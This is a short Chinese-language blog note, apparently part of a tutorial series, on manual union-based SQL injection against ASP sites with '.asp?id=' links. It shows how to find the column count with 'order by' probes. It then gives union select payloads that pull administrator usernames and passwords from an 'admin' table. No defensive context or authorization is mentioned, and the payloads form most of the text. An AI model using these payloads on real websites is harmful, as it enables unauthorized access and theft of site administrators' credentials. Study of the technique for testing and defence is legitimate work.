欢迎拜访我的新博客～～

1.2 SQL注入原理-手工联合查询

1. 使用条件：和上一遍笔记相同，即链接以【.asp?id=】结尾。

   检测字段长度

2. 在链接后面添加语句【order by 11】，页面显示正常。

   这里的order是数据库里的排序语句，order by 11 表明将内容以第11个字段排序。
   

3. 添加语句【order by 12】，页面报错。说明此站的字段长度为11。

爆破管理员用户名、密码

1. 在链接后面添加【union select 1,2,3,4,5,6,7,8,9,10,11 from admin】，页面显示数字2和3。

   union select是联合查询语句
   

2. 在链接后面添加语句【union select 1,admin,password,4,5,6,7,8,9,10,11 from admin】，即可暴出管理员用户名和密码。